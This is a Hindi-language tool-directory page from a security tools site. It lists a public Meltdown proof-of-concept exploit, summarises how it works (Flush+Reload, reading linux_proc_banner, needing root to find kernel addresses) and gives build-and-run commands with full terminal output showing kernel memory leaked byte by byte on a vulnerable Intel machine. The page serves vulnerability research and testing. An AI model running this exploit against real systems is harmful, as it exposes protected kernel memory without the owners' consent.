Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
meltdown-exploit — Meltdown Exploit PoC | Kitploit
उपकरण/GitHubGitHub/paboldin/meltdown-exploit
मेमोरी फोरेंसिकभेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubpaboldin/meltdown-exploit

meltdown-exploit

Meltdown Exploit PoC

रिपॉजिटरी देखें
9492638 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

मेल्टडाउन एक्सप्लॉइट पीओसी

स्पेक्युलेटिव ऑप्टिमाइज़ेशन कोड को असुरक्षित तरीके से निष्पादित करते हैं, जिससे माइक्रोआर्किटेक्चर जैसे कैश में डेटा के निशान रह जाते हैं।

लिप्प एट अल. 2018 ने अपना कोड 2018-01-09 को https://github.com/IAIK/meltdown पर प्रकाशित किया। विवरण के लिए उनका पेपर देखें: https://meltdownattack.com/meltdown.pdf।

फिलहाल केवल linux_proc_banner को डंप कर सकता है, क्योंकि इसके लिए एक्सेस की गई मेमोरी को कैश में होना आवश्यक है और linux_proc_banner हर बार /proc/version से पढ़ने पर कैश हो जाता है। prefetch के साथ काम कर सकता है। sched_yield के साथ काम करता है।

make के साथ बिल्ड करें, ./run.sh के साथ चलाएँ।

अभी तक KASLR को हरा नहीं सकता, इसलिए आपको /proc/kallsyms में linux_proc_banner खोजने के लिए अपना पासवर्ड दर्ज करने की आवश्यकता हो सकती है (या मैन्युअल रूप से करें)।

Flush+Reload और टार्गेट ऐरे दृष्टिकोण स्पेक्ट्रे पेपर https://spectreattack.com/spectre.pdf से लिया गया है, जिसे https://cyber.wtf/2017/07/28/negative-result-reading-kernel-memory-from-user-mode/ के संकेतों का पालन करके कार्यान्वित किया गया है।

पंडोरा का बक्सा खुल गया है।

पूरा एक्सप्लॉइट देखें जो मेरी मशीन पर IAIK के संस्करण के साथ काम करता है।

परिणाम:

root@kitploit:~
$ make
cc -O2 -msse2   -c -o meltdown.o meltdown.c
cc   meltdown.o   -o meltdown
$ ./run.sh 
looking for linux_proc_banner in /proc/kallsyms
protected. requires root
+ find_linux_proc_banner /proc/kallsyms sudo
+ sudo awk 
	/linux_proc_banner/ {
		if (strtonum("0x"$1))
			print $1;
		exit 0;
	} /proc/kallsyms
+ linux_proc_banner=ffffffffa3e000a0
+ set +x
cached = 29, uncached = 271, threshold 88
read ffffffffa3e000a0 = 25 %
read ffffffffa3e000a1 = 73 s
read ffffffffa3e000a2 = 20  
read ffffffffa3e000a3 = 76 v
read ffffffffa3e000a4 = 65 e
read ffffffffa3e000a5 = 72 r
read ffffffffa3e000a6 = 73 s
read ffffffffa3e000a7 = 69 i
read ffffffffa3e000a8 = 6f o
read ffffffffa3e000a9 = 6e n
read ffffffffa3e000aa = 20  
read ffffffffa3e000ab = 25 %
read ffffffffa3e000ac = 73 s
read ffffffffa3e000ad = 20  
read ffffffffa3e000ae = 28 (
read ffffffffa3e000af = 62 b
read ffffffffa3e000b0 = 75 u
read ffffffffa3e000b1 = 69 i
read ffffffffa3e000b2 = 6c l
read ffffffffa3e000b3 = 64 d
read ffffffffa3e000b4 = 64 d
read ffffffffa3e000b5 = 40 @
VULNERABLE
VULNERABLE ON
4.10.0-42-generic #46~16.04.1-Ubuntu SMP Mon Dec 4 15:57:59 UTC 2017 x86_64
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 158
model name	: Intel(R) Core(TM) i7-7700HQ CPU @ 2.80GHz
stepping	: 9
microcode	: 0x5e
cpu MHz		: 3499.316
cache size	: 6144 KB
physical id	: 0

काम करता है

असुरक्षित CPU/कर्नेल सूची यहाँ स्थानांतरित की गई है: https://github.com/paboldin/meltdown-exploit/issues/19

असुरक्षित नहीं CPU/कर्नेल सूची यहाँ स्थानांतरित की गई है: https://github.com/paboldin/meltdown-exploit/issues/22

टूल डाउनलोड करें